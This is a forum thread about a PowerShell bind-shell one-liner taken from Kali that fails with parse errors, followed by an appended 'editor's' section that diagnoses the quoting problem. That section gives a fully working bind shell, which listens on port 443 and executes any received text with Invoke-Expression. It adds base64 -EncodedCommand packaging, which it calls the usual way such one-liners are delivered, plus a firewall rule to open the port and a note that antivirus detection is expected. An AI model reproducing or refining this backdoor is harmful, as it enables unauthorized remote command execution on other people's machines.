Bind shell command not working

Hi,

Since I am a newbie with PowerShell but intend to master it, forgive my following question.

I get errors when I try to execute the following command, for making a connection with my other computer:

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.Start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

I get the following errors output:

powershell : At line:1 char:69
At line:1 char:1
+ powershell -c "$listener = New-Object System.Net.Sockets.TcpListener( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (At line:1 char:69:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

+ ... Object System.Net.Sockets.TcpListener('0.0.0.0' ,443);.start( ); = .A ...
+                                                                  ~
An expression was expected after '('.
At line:1 char:92
+ ... ts.TcpListener('0.0.0.0' ,443);.start( ); = .AcceptTcpClient(); =.Get ...
+                                                                  ~
An expression was expected after '('.
At line:1 char:107
+ ... '0.0.0.0' ,443);.start( ); = .AcceptTcpClient(); =.GetStream();[byte[ ...
+                                                                  ~
An expression was expected after '('.
At line:1 char:155
+ ...  =.GetStream();[byte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length ...
+                                                                  ~
Missing expression after ','.
At line:1 char:156
+ ... ream();[byte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length)) -ne 0 ...
+                                                           ~~~~~~~
Unexpected token '.Length' in expression or statement.
At line:1 char:155
+ ...  =.GetStream();[byte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length ...
+                                                                  ~
Missing closing ')' in expression.
At line:1 char:165
+ ... am();[byte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length)) -ne 0){ ...
+                                                                  ~
Missing statement body in while loop.
At line:1 char:171
+ ... yte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length)) -ne 0){; = (Ne ...
+                                                                 ~
Unexpected token ')' in expression or statement.
At line:1 char:236
+ ... = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = ...
+                                                                  ~
Missing ')' in method call.
At line:1 char:239
+ ... New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (i ...
+                                                                  ~
Missing expression after ',' in pipeline element.
Not all parse errors were reported.  Correct the reported errors and try again.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ExpectedExpression

Richard,
Welcome to the forum.

Since you’re not formatting the code and error messages as code it is very hard to read and the forum software does the rest messing it up. So please go back, edit your existing question again and fix the formatting.

When you post code, sample data, console output or error messages please format it as code using the preformatted text button ( </> ). Simply place your cursor on an empty line, click the button and paste your code.

Thanks in advance

How to format code in PowerShell.org

Regardless of that - what do you actually want to achieve with your code?

Thank you very much Olaf.

I will put the formatted code below following your suggestions.

I want to achieve a connection with my Linux computer… On my Linux it is not a problem, it is waiting for the connection with netcat or powercat etc.

This code I got from the manual of Kali but apparently it does not work.

Here’s the code:

`powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start( );$client = $listener.AcceptTcpClient();$stream =$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback =(iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '>';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"`
powershell : At line:1 char:69
At line:1 char:1
+ powershell -c "$listener = New-Object System.Net.Sockets.TcpListener( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (At line:1 char:69:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
 
+ ... Object System.Net.Sockets.TcpListener('0.0.0.0' ,443);.start( ); = .A ...
+                                                                  ~
An expression was expected after '('.
At line:1 char:92
+ ... ts.TcpListener('0.0.0.0' ,443);.start( ); = .AcceptTcpClient(); =.Get ...
+                                                                  ~
An expression was expected after '('.
At line:1 char:107
+ ... '0.0.0.0' ,443);.start( ); = .AcceptTcpClient(); =.GetStream();[byte[ ...
+                                                                  ~
An expression was expected after '('.
At line:1 char:155
+ ...  =.GetStream();[byte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length ...
+                                                                  ~
Missing expression after ','.
At line:1 char:156
+ ... ream();[byte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length)) -ne 0 ...
+                                                           ~~~~~~~
Unexpected token '.Length' in expression or statement.
At line:1 char:155
+ ...  =.GetStream();[byte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length ...
+                                                                  ~
Missing closing ')' in expression.
At line:1 char:165
+ ... am();[byte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length)) -ne 0){ ...
+                                                                  ~
Missing statement body in while loop.
At line:1 char:171
+ ... yte[]] = 0..65535|%{0};while((  = .Read(, 0, .Length)) -ne 0){; = (Ne ...
+                                                                 ~
Unexpected token ')' in expression or statement.
At line:1 char:236
+ ... = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = ...
+                                                                  ~
Missing ')' in method call.
At line:1 char:239
+ ... New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (i ...
+                                                                  ~
Missing expression after ',' in pipeline element.
Not all parse errors were reported.  Correct the reported errors and try again.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ExpectedExpression

And above you'll find the error output.

While I have no experience with connecting to Linux, the code from the command line you provided is hard to read. Broken down into its individual commands, the code looks like this:

# Listen on all interfaces, TCP port 443, and wait for one client to connect
$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443)
$listener.Start()
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
# 64 KiB receive buffer
[byte[]]$bytes = 0..65535 | ForEach-Object{0}
# Read() returns 0 when the remote side closes the connection
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    # Decode what was received as ASCII and run it as a PowerShell command;
    # errors are merged into the output (2>&1) so the remote side sees them
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (Invoke-Expression $data 2>&1 | Out-String )
    # Append a prompt showing the current directory and send everything back
    $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '>'
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()
$listener.Stop()

This way you could run the code piece by piece. It might be easier to debug this way. While I actually have no idea what this code should do, some lines look weird.

You may ask this question in a Kali related forum as well and ask if someone already was able to successfully establish a connection this way. :wink:
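The error text quoted in the thread already contains the diagnosis: `;.start( ); = .AcceptTcpClient(); =.GetStream()` and `.Read(, 0, .Length)` are what the one-liner looks like after every `$listener`, `$client`, `$stream`, `$bytes` and `$i` has been replaced by an empty string. That is what happens when `powershell -c "..."` is typed at an existing PowerShell prompt: the outer PowerShell expands the (undefined) variables inside the double-quoted argument before the child powershell.exe ever sees it, and the leading `powershell : ... NativeCommandError` line confirms a PowerShell session invoked powershell.exe as a native command. The Kali one-liner is written for cmd.exe, which does no `$` expansion. The following is an added example by the editor, not code from the thread or from the Kali documentation; it reproduces the expansion, gives the bind shell as a script block that runs directly, and shows ways to hand it to a child process without the quoting problem. It assumes Windows PowerShell 5.1 or PowerShell 7 on Windows, and keeps the thread's listener address and port (0.0.0.0:443); the `ConvertTo-EncodedCommand` helper is the editor's own.

```powershell
# Added example (editor's own; not from the thread or the Kali docs).

# --- 1. Reproduce the problem --------------------------------------------
# $client and $listener are undefined in this scope, so inside double quotes
# they expand to '' exactly as in the thread's error output.
$asTyped  = "$client = $listener.AcceptTcpClient()"    # -> ' = .AcceptTcpClient()'
$intended = '$client = $listener.AcceptTcpClient()'    # single quotes: no expansion
"as typed : $asTyped"
"intended : $intended"

# --- 2. The bind shell, with no outer quoting involved --------------------
$bindShell = {
    # Listen on all interfaces. Binding 443 fails if another service (IIS,
    # for instance) already owns the port; pick another port in that case.
    $listener = New-Object System.Net.Sockets.TcpListener([System.Net.IPAddress]::Any, 443)
    $listener.Start()

    # Blocks until exactly one client connects; the script exits after that
    # client disconnects, so a second nc session needs a fresh listener.
    $client = $listener.AcceptTcpClient()
    $stream = $client.GetStream()
    $buffer = New-Object byte[] 65536
    $ascii  = [System.Text.Encoding]::ASCII

    # Read() returns 0 when the peer closes the connection.
    while (($n = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
        $command = $ascii.GetString($buffer, 0, $n)
        # Whatever arrives on the socket is executed; 2>&1 merges errors into
        # the output so the remote side sees them too. Lab hosts only.
        $output  = (Invoke-Expression $command 2>&1 | Out-String)
        $reply   = $ascii.GetBytes($output + 'PS ' + (Get-Location).Path + '> ')
        $stream.Write($reply, 0, $reply.Length)
        $stream.Flush()
    }
    $client.Close()
    $listener.Stop()
}

# --- 3. Launching it -------------------------------------------------------
# (a) In the current session, nothing re-parses the text:
#     & $bindShell
#
# (b) From an existing PowerShell prompt into a child powershell.exe, pass the
#     text as a variable or a SINGLE-quoted string so the caller does not
#     expand the $vars. From cmd.exe the double-quoted Kali one-liner works
#     as written, because cmd does not expand $.
$oneLiner = $bindShell.ToString()
# powershell -NoProfile -Command $oneLiner

# (c) Base64 of UTF-16LE text for -EncodedCommand, which sidesteps quoting
#     entirely and is the usual way these one-liners are delivered.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    # powershell.exe -EncodedCommand expects base64 over UTF-16LE, not UTF-8.
    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Script))
}
$encoded = ConvertTo-EncodedCommand -Script $oneLiner
"powershell -NoProfile -EncodedCommand $encoded"

# A bind shell needs an inbound allow rule on the Windows host (elevated):
#   New-NetFirewallRule -DisplayName 'lab bind shell' -Direction Inbound `
#       -Protocol TCP -LocalPort 443 -Action Allow
# This requirement is why reverse shells, where Windows connects out to the
# waiting netcat, are far more common in practice.
```

Once the listener is up, connect from the Linux side with `nc <windows-ip> 443` (or powercat in client mode) and type commands at the `PS C:\...>` prompt the script sends back. If Windows Defender or another AV quarantines the script before it runs, that is expected behaviour for this well-known payload, not a quoting problem.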